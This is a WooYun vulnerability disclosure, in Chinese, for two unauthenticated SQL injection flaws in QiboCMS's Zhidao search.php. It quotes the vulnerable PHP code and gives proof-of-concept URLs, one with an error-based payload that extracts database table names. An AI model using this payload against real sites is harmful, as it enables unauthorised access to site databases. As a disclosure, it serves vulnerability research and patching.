qibocms知道系统SQL注入2枚 | wooyun-2015-0115138| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115138

漏洞标题：qibocms知道系统SQL注入2枚

漏洞作者：路人甲

提交时间：2015-05-20 14:44

修复时间：2015-05-25 14:46

公开时间：2015-05-25 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-20：细节已通知厂商并且等待厂商处理中
2015-05-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

第一枚：
zhidao/search.php

$sort_where="where `qa_quantity`>0";
        foreach($forSearchKey as $key){
                $sort_where_a[]="BINARY `name` like('%$key%')";
        }
        if(count($sort_where_a)>0){
                $sort_where.=" AND (".implode(" or ",$sort_where_a).")";
                $query=$db->query("SELECT `fid`,`name`,`qa_quantity` FROM `{$_pre}sort` $sort_where ");
                while($rs=$db->fetch_array($query)){
                        $sort_list[]=$rs;
                }       
        }

语句中把先是赋值给数组sort_where_a，然后在分割为字符串赋给变量where
这本来是没有问题的，但是数组sort_where_a未初始化，结合齐博的伪全局机制就造成了sql注入（无限制无需登录）
第二枚：
zhidao/search.php

if(count($forSearchKey)>2){
                        for($i=0;$i<ceil(count($forSearchKey)/2);$i++){
                                for($j=0;$j<count($forSearchKey);$j++){
                                        if($i!=$j){
                                                $fulltext[]=" (BINARY `title` like('%".$forSearchKey[$i]."%') AND BINARY `title` like('%".$forSearchKey[$j]."%'))";
                                        }
                                }
                        }
                        
                        $where.=" AND (".implode(" or ",$fulltext).")";
                        
                }

进入该语句需要count($forSearchKey)>2 但是forSearchKey我们是可以控制的
在第一个语句中把先是赋值给数组fullext，然后在分割为字符串赋给变量where（）
这本来是没有问题的，但是数组fullext未初始化，结合齐博的伪全局机制就造成了sql注入（无限制无需登录）
而在同一页面中带进了查询语句

$min=($page-1)*$rows;
        
        
        $query = $db->query("SELECT `aid`,`sortid`,`sid`,`info_cate`,`title`,`addtime`,`uid`,`username`,`content`,`money`,`isover`,`imgs` FROM {$_pre}content $where ORDER BY `addtime` DESC LIMIT $min,$rows");

漏洞证明：

http://localhost/zhidao/zhidao/search.php?&tags=ll%20ll%20ll&keyword=111&fulltext[]=11)

http://localhost/zhidao/zhidao/search.php?&tags=ll%20ll%20ll&keyword=111&fulltext[]=11)%20and%201=2%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b%23

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-05-25 14:46

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115138

漏洞标题：qibocms知道系统SQL注入2枚

相关厂商：齐博CMS

漏洞作者：路人甲

提交时间：2015-05-20 14:44

修复时间：2015-05-25 14:46

公开时间：2015-05-25 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115138

漏洞标题：qibocms知道系统SQL注入2枚

相关厂商：齐博CMS

漏洞作者： 路人甲

提交时间：2015-05-20 14:44

修复时间：2015-05-25 14:46

公开时间：2015-05-25 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0115138"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云